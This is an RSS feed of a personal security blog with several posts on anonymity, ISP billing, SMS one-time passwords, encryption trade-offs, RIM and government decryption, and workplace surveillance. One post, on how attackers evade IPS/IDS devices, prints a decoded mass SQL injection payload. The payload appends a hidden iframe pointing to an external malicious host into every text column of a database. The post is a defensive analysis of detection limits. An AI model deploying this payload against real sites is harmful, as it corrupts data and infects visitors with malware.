<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Michael N. Dundas &#187; Security</title>
	<atom:link href="http://michaeldundas.com/category/security/feed/" rel="self" type="application/rss+xml" />
	<link>http://michaeldundas.com</link>
	<description>Precision, Integrity, Communication</description>
	<lastBuildDate>Fri, 04 May 2012 20:56:55 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.2</generator>
		<item>
		<title>So, you want to be anonymous: An Introduction</title>
		<link>http://michaeldundas.com/2012/03/13/so-you-want-to-be-anonymous-an-introduction/</link>
		<comments>http://michaeldundas.com/2012/03/13/so-you-want-to-be-anonymous-an-introduction/#comments</comments>
		<pubDate>Tue, 13 Mar 2012 09:43:51 +0000</pubDate>
		<dc:creator>Clear2Go</dc:creator>
				<category><![CDATA[Privacy and Anonymity]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[Surveillance]]></category>

		<guid isPermaLink="false">http://michaeldundas.com/?p=2827</guid>
		<description><![CDATA[I often have conversations with people about being anonymous specifically while on the Internet.  Most people believe that anonymity is not possible today.  Others believe that by doing specific steps (deleting your browser history, ensuring SSL is active are two of many examples) you will not be traced.  In my opinion and experience both points [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://michaeldundas.com/wp-content/uploads/2012/03/ladyAndManInBalaclava.png"><img class="alignleft size-full wp-image-2835" title="ladyAndManInBalaclava" src="http://michaeldundas.com/wp-content/uploads/2012/03/ladyAndManInBalaclava.png" alt="" /></a>I often have conversations with people about being anonymous, specifically while on the Internet. Most people believe that anonymity is not possible today. Others believe that by taking specific steps (deleting your browser history and ensuring SSL is active are two of many examples) you will not be traced. In my opinion and experience both points of view are correct. While there is never a 100% guarantee of being totally anonymous, you can take steps to improve your anonymity. The first step to being anonymous is to understand that anonymity is not black and white. There are lots of questions you have to assess and answer. What is the situation you find yourself in? Why do you want to remain anonymous in the situation? Who may try to discover your identity in that situation? How badly will someone or a group want to obtain your true identity? What resources and intelligence do you have at your disposal to protect your anonymity? What resources and intelligence does the individual or group that would want to discover who you really are have available to them? These are but a few of the many questions, and their applicability depends on the situation.</p>
<p>A good analogy to anonymity is basic physical security. I have security at my home: the doors lock, the windows close and lock, only certain people have keys, and there is an alarm system. If you compare my home security to the home security of a criminal organization&#8217;s leader, you can be certain they will have more security than I do in my home. They may have people standing post watching all sides of the house, large perimeter fences with alarms, bulletproof windows, steel doors with reinforced frames, hired bodyguards throughout the home, rehearsed escape plans with getaway vehicles and whatever else they deem necessary. You can walk up to my front door and ring the doorbell; I might even answer if I am home. You would first have to find the home of the leader of a criminal organization. They probably have multiple homes, so you would have to determine which one they were in at a particular time. Assuming you could accomplish that, you probably would not make it to the front door if you tried, let alone have the leader answer the door if you did physically get to it. It is not just that the criminal organization has far more money than I do that explains why they have better security. It is because they have something of much higher financial value to protect than I do. A criminal organization that has something of value to protect (merchandise, leader, industry knowledge) is willing to spend more money on security because the risk of losing what they are protecting is greater. Security is the same with any organization, be it financial, private, pharmaceutical, mining, government, or whatever. What are the most treasured items or knowledge I have to protect? How much do I have to lose if those items or that knowledge were stolen or obtained? What is an acceptable level of risk for losing this property or knowledge? What will the cost of security be to get to an acceptable level of risk?</p>
<p>Anonymity is no different. If I want to purchase a gift for a family member that costs $100, I can spend hours setting up tunnelling protocols, configuring a special browser and operating system, and setting up an untraceable method of payment so that I can place my order knowing with confidence that my family, my ISP, law enforcement, and anyone else won&#8217;t know (at least not without a lot of time and money on their part). I may have to learn how to do all this. But even if someone already knows how, it takes time to set this up and check that it is in fact secure. For me, that time is worth more than the $100 I am spending on the gift. I&#8217;d probably just order it on a normal PC, using a normal Internet connection, clear the browser history, and hope no one sees the credit card statement before the gift arrives. Could my ISP see that I ordered flowers? If they wanted to, yes. Do I care? Not really.</p>
<p>But what if I want to browse a particular website and not have Google know about it? What if I wish to do research on a particular topic and don&#8217;t want any person, group or company knowing that I am interested in that topic? What if I am conducting an investigation into an individual who works for a company, and we know he is technically savvy and has an intricate knowledge of security? In those cases, it is worth my time to plan properly so the risk of being exposed is reduced. These questions, and how to address them, will be the topic of a series of blog posts I will write entitled &#8220;So, you want to be anonymous.&#8221; I am not sure how many posts will be in the series yet (I suspect 4 or 5), but I will try to keep each post short and cover one topic of maintaining anonymity. Anonymity on the Internet is something that has always interested me and many others. There is lots of information on the Internet about it (both true and false). I used to have to keep up with being anonymous in order to do some of the work I have done in the past. Today, I mainly keep up with it just because it interests me. The next posts in this series will start with a general discussion of a few of the basic ways you can be monitored at the network as well as application levels. Next we can discuss ways to avoid being monitored and to minimize digital trace evidence that can lead back to a particular target from the network, service, and application perspective.</p>
<p>Series Index:</p>
<p>1. <a href="http://michaeldundas.com/2012/04/22/so-you-want-to-be-anonymous-your-ip-address-the-low-hanging-fruit/">Your IP Address, the low hanging fruit</a></p>
<p style="text-align: right;">  <a href="http://www.flickr.com/photos/nofutureface/">Photo courtesy of&#8230;</a></p>
]]></content:encoded>
			<wfw:commentRss>http://michaeldundas.com/2012/03/13/so-you-want-to-be-anonymous-an-introduction/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Usage based billing (ubb) coming soon</title>
		<link>http://michaeldundas.com/2011/01/24/usage-based-billing-coming-soon/</link>
		<comments>http://michaeldundas.com/2011/01/24/usage-based-billing-coming-soon/#comments</comments>
		<pubDate>Mon, 24 Jan 2011 07:49:01 +0000</pubDate>
		<dc:creator>Clear2Go</dc:creator>
				<category><![CDATA[Surveillance]]></category>

		<guid isPermaLink="false">http://michaeldundas.com/?p=2369</guid>
		<description><![CDATA[If you currently subscribe to an ISP in Canada, particularly one that provides DSL access (via your phone line), you are about to be subjected to a bill increase. Michael Geist has an article linking to current resources here. While some of my information on this topic has come from blogs I follow, as well [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://michaeldundas.com/wp-content/uploads/2011/01/minoxSpyCam.png"><img class="alignleft size-full wp-image-2377" title="minoxSpyCam" src="http://michaeldundas.com/wp-content/uploads/2011/01/minoxSpyCam.png" alt="" width="240" height="160" /></a>If you currently subscribe to an ISP in Canada, particularly one that provides DSL access (via your phone line), you are about to be subjected to a bill increase. Michael Geist has an article linking to current resources <a href="http://www.michaelgeist.ca/content/view/5591/125/">here</a>.</p>
<p>While some of my information on this topic has come from blogs I follow, as well as discussions with friends and co-workers I still keep in touch with since I left the telecommunications industry, a main source has been a long-time friend of mine. He owns a small ISP in London and became involved with <a href="http://cnoc.ca/">CNOC</a>, a group of ISPs in Canada attempting to fight the CRTC ruling permitting Bell to charge in this manner.</p>
<p>While I don&#8217;t agree with the CRTC permitting Bell to charge in this manner given their obvious monopoly and reach, there are a couple of positive things I see as a result. On a personal note, it is nice to see my friend engaging with other ISPs in this discussion and taking more of an active role. That behaviour is not natural for him and pushes him outside his comfort zone. I am happy to see him doing this. From a general perspective, while the decision is not in my opinion smart from a competitive perspective, I think it is at least a step forward because it forces ISPs to start charging bandwidth costs to the end consumers that use the resource. This is something that should have happened years ago, and I believe that if it had, it would have made the Net Neutrality debate non-existent or at least much less of a debate. As I have stated before, in my opinion bandwidth is a utility and today, more than ever, its characteristics are similar to a utility. It should be regulated as such and charged according to market costs in a real competitive environment, not a monopoly (of course in Canada there is a monopoly, or at least an environment that is pretty close to one).</p>
<p>As a result of this new legislation, I have started monitoring bandwidth usage from my home connection.  I wrote a very basic script that simply queries the internet interface of my gateway every 5 minutes, gathers the raw transmit and receive bytes and stores them in a file along with a time stamp.</p>
<p><a href="http://michaeldundas.com/wp-content/uploads/2011/01/homeBWLogSample1.png"><img class="aligncenter size-full wp-image-2374" title="homeBWLogSample1" src="http://michaeldundas.com/wp-content/uploads/2011/01/homeBWLogSample1.png" alt="" width="282" height="207" /></a></p>
<p>Once usage based billing (ubb) takes effect in March 2011, I plan to take this data, use Python to generate some graphs, and put the bandwidth usage into a format that can be compared to the usage my ISP generates as well as the usage that Bell provides for my DSL line. In my experience, measurement is a tricky thing, and I am curious about any differences that might arise.</p>
<p style="text-align: right;"><a href="http://www.flickr.com/photos/dcaid/4258501451/"><em>photo credit</em></a></p>
]]></content:encoded>
			<wfw:commentRss>http://michaeldundas.com/2011/01/24/usage-based-billing-coming-soon/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>One time password over SMS</title>
		<link>http://michaeldundas.com/2010/10/25/one-time-password-over-sms/</link>
		<comments>http://michaeldundas.com/2010/10/25/one-time-password-over-sms/#comments</comments>
		<pubDate>Mon, 25 Oct 2010 15:40:24 +0000</pubDate>
		<dc:creator>Clear2Go</dc:creator>
				<category><![CDATA[External Services]]></category>
		<category><![CDATA[Security]]></category>

		<guid isPermaLink="false">http://michaeldundas.com/?p=2212</guid>
		<description><![CDATA[A recent article by Seth Godin discusses  a security mechanism to help the end user identify counterfeit medicine.  This methodology is not new, but can be effective.  It uses the idea of a one time password (OTP) over SMS.   The concept of OTP has been around for a while.  SMS has also been around [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://michaeldundas.com/wp-content/uploads/2010/10/oldKey.png"><img class="alignleft size-full wp-image-2220" title="oldKey" src="http://michaeldundas.com/wp-content/uploads/2010/10/oldKey.png" alt="" width="250" height="188" /></a><a href="http://sethgodin.typepad.com/seths_blog/2010/10/avoiding-counterfeits-building-permission.html">A recent article by Seth Godin</a> discusses a security mechanism to help the end user identify counterfeit medicine. This methodology is not new, but it can be effective. It uses the idea of a one time password (OTP) over SMS. The concept of OTP has been around for a while. SMS has also been around for a while. Many mobile operators have used OTP over SMS for user authentication to a particular service. But I think more businesses should use it for user verification. Financial, insurance, medical or any other company that provides a service where user authentication is critical would benefit from an OTP over SMS deployment.</p>
<p>Here is how it works. Let&#8217;s use on-line banking as an example. Using their home laptop, the customer connects to their financial institution&#8217;s on-line banking site. The customer enters their access card number and password. Upon successful verification of the access card and password, the screen prompts the customer to enter a one time password. That password is sent via SMS to the mobile number previously provided by the customer. Upon receipt of the SMS message containing the one time password, the customer enters that password into the screen on their laptop. Assuming it is correct, the customer is permitted to proceed with their banking.</p>
<p>It protects against phishing because the second factor comes from a separate system. When a bot is installed that attempts to grab and extract your access card and password, those alone are no longer enough. It also has to figure out a way to capture the next one-time password, which is much more difficult. It makes re-sale of customer access card numbers, passwords, credit card numbers and other information practically useless. Selling this information to criminals is big business today.</p>
<p>The one time password is only valid for the current session which is already established.  Any new or future session requires a new one time password.  The password is transmitted on a completely separate channel from the session being verified.  The device is separate, the network is separate and the company providing the transmission of the password (in this case the mobile operator) is separate.  For this attack to be repeatable, the attacker would have to compromise the SMS phone system on top of your laptop or bank infrastructure. While this is probably not impossible, it is a lot more difficult.</p>
<p>OTP over SMS is relatively easy to implement today. Most people have mobile phones today. The technology to send SMS is commonplace. It is easy for a typical end user to understand the security benefits derived from this method, and it is not too cumbersome for them.</p>
<p>It is not foolproof, mind you. Malware installed on the device accessing on-line banking, such as your laptop, that is intelligent enough to wait for you to enter the one time password and then use that session to attack would still work, but that is a much harder attack to accomplish. As a result this solution minimizes the attack surface available to attackers.</p>
<p>To make it more secure, the ability to turn on this feature or provide the phone number could be offered via customer support only. The customer would have to call in to make the change. Most people today have mobile phones, and typically it is a device that is always physically with them. This makes it a great tool for deploying OTP.</p>
<p style="text-align: right;"><a href="http://www.flickr.com/photos/ul_marga/755378645"><em>photo credit</em></a></p>
]]></content:encoded>
			<wfw:commentRss>http://michaeldundas.com/2010/10/25/one-time-password-over-sms/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Encryption can decrease security</title>
		<link>http://michaeldundas.com/2010/10/20/encryption-can-decrease-security/</link>
		<comments>http://michaeldundas.com/2010/10/20/encryption-can-decrease-security/#comments</comments>
		<pubDate>Wed, 20 Oct 2010 08:49:44 +0000</pubDate>
		<dc:creator>Clear2Go</dc:creator>
				<category><![CDATA[Encryption]]></category>
		<category><![CDATA[Security]]></category>

		<guid isPermaLink="false">http://michaeldundas.com/?p=2191</guid>
		<description><![CDATA[There are lots of people who think that encryption always increases security. While encryption is good and necessary, sometimes having it can actually decrease security. I have been running into this issue enough lately that I feel the need to write about it. To illustrate, let's use a really simple example. Here we have a [...]]]></description>
			<content:encoded><![CDATA[<p>There are lots of people who think that encryption always increases security. While encryption is good and necessary, sometimes having it can actually decrease security. I have been running into this issue enough lately that I feel the need to write about it. To illustrate, let&#8217;s use a really simple example.</p>
<p><a href="http://michaeldundas.com/wp-content/uploads/2010/10/websrvFwIpsDbServ1.png"></a><a href="http://michaeldundas.com/wp-content/uploads/2010/10/websrvFwIpsDbServ2.png"><img class="aligncenter size-full wp-image-2195" title="websrvFwIpsDbServ2" src="http://michaeldundas.com/wp-content/uploads/2010/10/websrvFwIpsDbServ2.png" alt="" width="400" height="120" /></a><br />
Here we have a web server that sends SQL queries to a back end database server. In between the two servers is a combination firewall / Intrusion Prevention System (IPS) that is configured to detect malicious SQL injection attacks, block the attack and alert security response teams when necessary. The IPS/firewall system is independent of the web server and the database server. It is an independent system designed simply to detect and respond to attacks by watching the communication between devices.</p>
<p>Eventually, a security consultant is hired to conduct a security review. One recommendation she makes is that the information being transmitted between the web server and the database server contains confidential information and therefore should be encrypted. Turning on encryption seems like a good idea: now the data between the web server and database server cannot be viewed by anything but the intended servers. The problem is that this includes the IPS system, which is designed to protect the database server from SQL injection attacks. Now an attacker can attack the system feeling secure that their attacks are hidden inside the encryption and undetectable.</p>
<p>Security policies that recommend a particular type of data should be encrypted need to take into account more than just the data. They also need to take into account the location of the source and destination of the transmission, and the physical and other security controls and systems involved in and around the transmission. No one would dispute that a credit card number being transmitted on the Internet should be encrypted. It will pass through networks and devices that are not under the sender&#8217;s or receiver&#8217;s control and therefore has a high risk of interception. If that same credit card number is being transmitted from a sender to a receiver where both are in the same data center, and access to devices in the data center is tightly controlled, then adding encryption only increases the complexity, hides attackers, and offers minimal to no value. Some suggest that in the data center someone might be able to gain access and sniff the traffic to obtain the transmitted credit card number, and therefore you have to encrypt the data. If that is truly the case, I&#8217;d suggest they have much bigger security concerns than someone sniffing data.</p>
<p>When making a decision on whether to encrypt data, does your organization take a look at the data, application, network design and other factors when assessing risk, or do they just look at the data?</p>
]]></content:encoded>
			<wfw:commentRss>http://michaeldundas.com/2010/10/20/encryption-can-decrease-security/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Evading IPS, IDS, and firewall security devices</title>
		<link>http://michaeldundas.com/2010/08/22/evading-ips-ids-and-firewall-security-devices/</link>
		<comments>http://michaeldundas.com/2010/08/22/evading-ips-ids-and-firewall-security-devices/#comments</comments>
		<pubDate>Sun, 22 Aug 2010 14:32:51 +0000</pubDate>
		<dc:creator>Clear2Go</dc:creator>
				<category><![CDATA[Security]]></category>

		<guid isPermaLink="false">http://michaeldundas.com/?p=2045</guid>
		<description><![CDATA[A friend and co-worker of mine Jerry Mangiarelli recently posted about a SQL injection attack that he has been following.  You can read his post here.  As he indicates, it is not a new attack, nor a very complex attack.  If you are interested in more details of the attack, SANS has more detailed review [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://michaeldundas.com/wp-content/uploads/2010/08/naturalMagnification.png"><img class="alignright size-full wp-image-2055" title="naturalMagnification" src="http://michaeldundas.com/wp-content/uploads/2010/08/naturalMagnification.png" alt="" width="312" height="234" /></a>A friend and co-worker of mine, Jerry Mangiarelli, recently posted about a SQL injection attack that he has been following. You can read his post <a href="http://jerrymangiarelli.blogspot.com/2010/08/another-mass-sql-injection-attack.html">here</a>. As he indicates, it is not a new attack, nor a very complex attack. If you are interested in more details of the attack, SANS has a more detailed review of the attack available <a href="http://isc.sans.edu/diary.html?storyid=9397&amp;">here</a>. My focus is not so much on the attack itself, but on the detection of the attack with security devices and why it is a harder problem than many realize.</p>
<p>I think this attack is a really good example of how difficult it is for firewall, IPS, and IDS vendors to detect these types of attacks. While the ability to do so is improving every day, and vendors will claim they can (and in some cases they can), the bad guys do have the advantage. For the purposes of this post, I want to focus on how the attack attempts to hide from deployed security systems. This attack is a great example of how easy it is to evade detection systems, for people that are not technically dealing with attacks day to day and wonder why it is so hard.</p>
<p>The key to this attack is the CAST function. This function (which is available in many programming languages) will convert one data type to another. A set of integers to a letter, or a decimal number to a hexadecimal number, are two examples. In the attack, hexadecimal is used to mask the alphanumeric requests to the database.</p>
<p>If you look at the actual CAST function request, you see 0x (which means the characters that follow are hexadecimal) followed by:</p>
<blockquote><p>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</p></blockquote>
<p>The CAST function will convert the hexadecimal above to alphanumeric text. The result of that conversion is:</p>
<blockquote><p>dEcLArE @T vaRchaR(255),@c vARCHAr(255) decLAre tabLE_cUrsOR CURSOR FoR SELECt A.name,b.naMe froM sysObjeCts a,sysCOLuMNs b wheRE a.id=B.id aND A.XtYPe=&#8217;U&#8217; and (b.xTYPe=99 or b.XType=35 oR B.xTYPe=231 OR b.xtypE=167) oPEN TAbLe_cuRsor fETCH neXT FROm TaBlE_CuRsOr INtO @T,@c whilE(@@FetCh_stAtuS=0) beGIn exEc(&#8216;UpDaTE ['+@t+'] SeT ['+@c+']=rtRIM(CONVeRT(VARCHAr(4000),['+@C+']))+caST(0x3C696672616D65207372633D22687474703A2F2F6E656D6F6875696C6469696E2E72752F7464732F676F2E7068703F7369643D31222077696474683D223022206865696768743D223022207374796C653D22646973706C61793A6E6F6E65223E3C2F696672616D653E aS vaRCHar(106))&#8217;) FETCh Next fRom tABle_cUrsOr IntO @t,@c EnD Close tablE_CuRsoR dEALLoCATe TaBLe_CURsor</p></blockquote>
<p>Now you can see how this looks more like a SQL statement; it is just masked. Where it becomes difficult for IPS/IDS vendors is that the translation I did above doesn&#8217;t happen until the request reaches the SQL engine of the targeted database. So in flight through the network it appears as hexadecimal. Do you design your IPS/IDS systems with a SQL engine that performs this function on every command? That takes time and resources. And what would you trigger on exactly in the decoded section above? The most logical thing to detect in the decoded section is exactly what the attackers have hidden.</p>
<p>If you look carefully, there is a second CAST function nested within the first CAST function.</p>
<blockquote><p>caST(0x3C696672616D65207372633D22687474703A2F2F6E656D6F6875696C6469696E2E72752F7464732F676F2E7068703F7369643D31222077696474683D223022206865696768743D223022207374796C653D22646973706C61793A6E6F6E65223E3C2F696672616D653E</p></blockquote>
<p>If you convert the hexadecimal in this inner CAST function you get:</p>
<blockquote><p>&lt;iframe src=&#8221;http://nemohuildiin.ru/tds/go.php?sid=1&#8243; width=&#8221;0&#8243; height=&#8221;0&#8243; style=&#8221;display:none&#8221;&gt;&lt;/iframe&gt;</p></blockquote>
<p>This would be the logical area to detect: a SQL query containing an HTML IFRAME tag pointing to an external, unknown website. And this is the attack. The problem is that the IPS/IDS, firewall or other security device would have to do the extra work of converting the CAST within the CAST function.</p>
<p>Processing recursively is resource intensive. How many times do you recurse through the CAST function? Are there other functions in SQL you should check? What if it is not hexadecimal but octal or some other numerical base?</p>
<p>While security vendors often claim they can detect the above, there are often many conditions around those claims that they do not explain. Encryption and nested functions as above are but a few examples. These problems go beyond just SQL injection as well, and apply to many types of attacks.</p>
<p>When evaluating these technologies, it is important that you have someone on your side who is independent of any vendors: an employee or consultant who understands your requirements, is technically sound and solid about how the technology works (not just in theory), and can work on your behalf to ensure you understand exactly what the technologies can and cannot do. You then have a real understanding of the risks and exposures you face.</p>
<p style="text-align: right;"><a href="http://www.flickr.com/photos/imagesbyrenate/365131896/"><em>photo credit</em></a></p>
]]></content:encoded>
			<wfw:commentRss>http://michaeldundas.com/2010/08/22/evading-ips-ids-and-firewall-security-devices/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Money always trumps security when they are in opposition</title>
		<link>http://michaeldundas.com/2010/08/09/money-always-trumps-security-when-they-are-in-opposition/</link>
		<comments>http://michaeldundas.com/2010/08/09/money-always-trumps-security-when-they-are-in-opposition/#comments</comments>
		<pubDate>Tue, 10 Aug 2010 03:35:57 +0000</pubDate>
		<dc:creator>Clear2Go</dc:creator>
				<category><![CDATA[Encryption]]></category>
		<category><![CDATA[Privacy and Anonymity]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[Surveillance]]></category>

		<guid isPermaLink="false">http://michaeldundas.com/?p=1977</guid>
		<description><![CDATA[I have been following the RIM security saga with India and Saudi Arabia.  I have previously mentioned, I have been in the U.A.E. in the past performing security consulting.  A few facts I know: All HTTP goes through a proxy. If you connect to a service provider, all your flows go through an HTTP proxy [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://michaeldundas.com/wp-content/uploads/2010/08/Flag_of_the_United_Arab_Emirates.png"><img class="alignright size-full wp-image-1995" title="Flag_of_the_United_Arab_Emirates" src="http://michaeldundas.com/wp-content/uploads/2010/08/Flag_of_the_United_Arab_Emirates.png" alt="" width="200" height="100" /></a>I have been following the <a href="http://www.rim.net">RIM</a> security saga with India and Saudi Arabia.  I have previously mentioned, I have been in the <a href="http://en.wikipedia.org/wiki/United_Arab_Emirates">U.A.E.</a> in the past performing security consulting.  A few facts I know:</p>
<p><strong>All HTTP goes through a proxy. </strong>If you connect to a service provider, all your flows go through an HTTP proxy system. The proxy system scans requests and compares them to a database of categorized sites. The government provides policies to the service providers, and it is required by law that they are enforced. They are enforced in real time. If you attempt to visit an unauthorized site, you will be redirected to a page in Arabic explaining that it is not permitted. I actually kept a screen capture of the page and was going to post it, but I can&#8217;t find it. However, if you are in Dubai, just try to go to a site that has questionable material. You will be redirected. Anyone can do it; it is not a secret.</p>
<p><strong>HTTPS was ready to be implemented. </strong>Approximately 2 years ago, they were testing the ability to decrypt SSL on the fly so that they could perform analysis on the requests and grant or deny access as with HTTP traffic.  I am sure this is deployed by now.</p>
<p><strong>Voice Over IP, Instant messaging and other protocols had specific policies.</strong> I won&#8217;t go into the details here, as I don&#8217;t know how public this information is, but there were active policies deployed around these and other protocols.</p>
<p><strong>Privacy is not the same as North America.</strong> In North America, we many feel that privacy is slowly being eroded.  In comparison to Dubai our policies with respect to privacy are impressive.  The ISP has the right to watch what you are doing and actively grant, block, and log your activities.  It is actually a requirement in order to get a license to be an ISP from the Government.</p>
<p>When Saudi Arabia indicated they were going to ban Research In Motion devices due to the fact the government was unable to decrypt communications as needed, I was hopeful that RIM would say too bad.  Of course that was the idealist in me hoping that RIM, a Canadian company with one of their key features they market is  about Blackberry and its security would not be compromised.  The realist in me understands that the Middle East is a growing market and from a business perspective RIM has no choice but to be a part of it.  If you want to do business in Canada you have to play by our rules, so it only makes sense that if you want to do business in the U.A.E., you have to play by their rules.  As expected, RIM <a href="http://www.thestar.com/business/companies/rim/article/845265--rim-reaches-deal-with-saudi-arabia-dodging-blackberry-ban">reached a deal with Saudi Arabia</a>.  They also<a href="http://www.reuters.com/article/idUSTRE6720A320100803"> reached a deal with India</a> earlier this week.</p>
<p>What I find amusing is the <a href="http://www.reuters.com/article/idUSTRE67151F20100802">latest spin they have put on security</a> given the situation.</p>
<blockquote><p>RIM made no direct comment on any discussions with the UAE or others, but it sought to reassure customers about the security of their data on BlackBerry networks.  &#8220;While RIM does not disclose confidential regulatory discussions that take place with any government, RIM assures its customers that it is committed to continue delivering highly secure and innovative products that satisfy the needs of both customers and governments,&#8221; the company said in a statement to customers.</p>
<p>A RIM spokeswoman could not be reached for comment.</p>
<p>RIM said in its statement that under its security system customers have their own encryption key and &#8220;only the customer ever possesses a copy&#8221; of that key.</p></blockquote>
<p>While I am sure they have not lied, you can&#8217;t have it both ways.  Either you comply with the government request that they can decrypt messages and data as they require, or you don&#8217;t.  Any other suggestion implies that the laws within the UAE have changed.  I am not a lawyer, but I haven&#8217;t seen any news about new laws protecting UAE citizens&#8217; privacy.  The best part is the last statement, about how the customers have their own encryption key that only they possess.  I am sure that statement is true.  But it is what is not said that is telling.  Are there any more encryption keys, other than the one the customer possesses, with respect to the customer&#8217;s messages?  Companies that deploy encryption and decryption of email, files, and data in general give each employee a copy of their own key that only they possess.  When encrypting data, the system creates some sort of a unique key (let&#8217;s call it E) that is actually used to encrypt or decrypt the data.  The E key is then encrypted with the customer&#8217;s encryption key (let&#8217;s call that key Ec).  The trick with businesses is that the E key is also encrypted with their own key (let&#8217;s call it Eb).  If you lose your key (Ec) or refuse to give it when asked, they can use their key Eb to decrypt and obtain the E key.  Once they have the E key, they can then decrypt the message.  There are several variations to this, but the basic premise from a recovery perspective is the same.</p>
<p style="text-align: center;"><a href="http://michaeldundas.com/wp-content/uploads/2010/08/emailEncRecovProcessHighLevel2.png"><img class="size-full wp-image-1987 aligncenter" title="emailEncRecovProcessHighLevel2" src="http://michaeldundas.com/wp-content/uploads/2010/08/emailEncRecovProcessHighLevel2.png" alt="" width="508" height="311" /></a></p>
<p>This is not the first time this has happened either.  Not sure how many people remember <a href="http://www.hushmail.com/">Hushmail</a>.  I wrote about them <a href="http://michaeldundas.com/2009/06/20/outsourcing-i-t-to-google-part-i-the-concerns/">here</a>.  Hushmail&#8217;s marketing was based on the fact that if you used them for email, no one but you could retrieve your email stored on their servers.  Even Hushmail staff were not able to retrieve the email if they wanted to, as they did not have the keys.  (Sound familiar to the RIM article above?)  Yet, when U.S. law enforcement contacted them about an individual they were investigating, Hushmail was able to <a href="http://www.wired.com/threatlevel/2007/11/hushmail-to-war/">provide them with 12 CDs filled with unencrypted emails of the individual under investigation</a>.</p>
<p>While I don&#8217;t blame RIM for bowing to the governments of India and Saudi Arabia if they wish to do business in their countries, I dislike the spin they are placing on security.  They are misleading the public and playing on the fact that many people do not understand the intricacies of security.  While they are not lying, I strongly suspect they are not being forthright.</p>
<p>When all the dust settles, it is important that people realize that money is what drives business.  You can claim all the morals, goals, and visions you want.  But if at some point these come into conflict and enough money is at stake, compromises will be made.  Security unfortunately is no different.</p>
]]></content:encoded>
			<wfw:commentRss>http://michaeldundas.com/2010/08/09/money-always-trumps-security-when-they-are-in-opposition/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>I am watching you, but you can&#8217;t watch me</title>
		<link>http://michaeldundas.com/2010/07/16/i-am-watching-you-but-you-cant-watch-me/</link>
		<comments>http://michaeldundas.com/2010/07/16/i-am-watching-you-but-you-cant-watch-me/#comments</comments>
		<pubDate>Fri, 16 Jul 2010 08:21:17 +0000</pubDate>
		<dc:creator>Clear2Go</dc:creator>
				<category><![CDATA[Forensics]]></category>
		<category><![CDATA[law enforcement]]></category>
		<category><![CDATA[Profiling]]></category>
		<category><![CDATA[Surveillance]]></category>

		<guid isPermaLink="false">http://michaeldundas.com/?p=1910</guid>
		<description><![CDATA[Several years ago I was hired to assist with an internal investigation.  The client, a large company, had some concerns about an employee and wanted to covertly gather information and data on what this employee was doing while at work.  For about a week, I sat passively on the network, monitoring the subject&#8217;s connections to [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://michaeldundas.com/wp-content/uploads/2010/07/iAmWatchingYou.png"><img class="alignright size-full wp-image-1917" title="iAmWatchingYou" src="http://michaeldundas.com/wp-content/uploads/2010/07/iAmWatchingYou.png" alt="" width="265" height="199" /></a>Several years ago I was hired to assist with an internal investigation.  The client, a large company, had some concerns about an employee and wanted to covertly gather information and data on what this employee was doing while at work.  For about a week, I sat passively on the network, monitoring the subject&#8217;s connections to servers, internet systems, e-mail, instant messaging and any other network connection.  There was not the selection of automated software there is today to accomplish this, so most of it was done with packet sniffers.  I would gather the data, use scripts to extract specific types of data and run it through statistical analysis, looking for data that was &#8216;different&#8217; or &#8216;suspect&#8217; in some way.  Basically the goal was to profile the user and compare his activities to other users.  Then, using this profile, identify and focus on things that didn&#8217;t fit.  Personally, I found it a little creepy.  Looking into the details of someone&#8217;s private life is not really fun; a part of me felt like I was being invasive, not respecting their privacy &#8212; and technically that is true.  But it was the job, what I was asked to do.  Sometimes doing things one would prefer not to do is necessary.</p>
<p>One thing I had identified to the client was that the subject was using a type of VoIP software.  They asked if it was possible to listen in on the voice conversations.  I told them it was, and that I could probably get them a copy of the voice conversations the subject had previously had during the time I was monitoring.  I had packet captures, most non-encrypted, so it was just work and time.  At the client&#8217;s request, I extracted the VoIP conversations into wmv files using the date and time of the call as the file name.</p>
<p>At the end of the job, I was having a conversation with the CTO.  He was wondering if there was an automated way to keep audio conversations of all the employees.  At the time, this technology was not as prevalent, cheap, and available to the general public as it is today.  I asked him if he thought that was really appropriate.  I explained that I had just listened in on someone&#8217;s private conversations.  Maybe it wasn&#8217;t any of the company&#8217;s business.  Maybe there were legalities if they were to do that (yes, I was annoyed).  His response was very quick.  &#8220;The company has a right to view all data, monitor activity that its equipment or network is used for, period&#8221;.  He told me all the employees know this and sign a document to that effect.  I said that made sense.  I asked him what he would think if he was in a confidential conversation on the phone with someone in a different province and Bell had listened in on his conversation?  I said that I assumed he didn&#8217;t have a problem with it; after all, it is their network, their devices.  Aside from the angry facial expression, he said that was &#8216;different&#8217; and they shouldn&#8217;t be allowed to do that.</p>
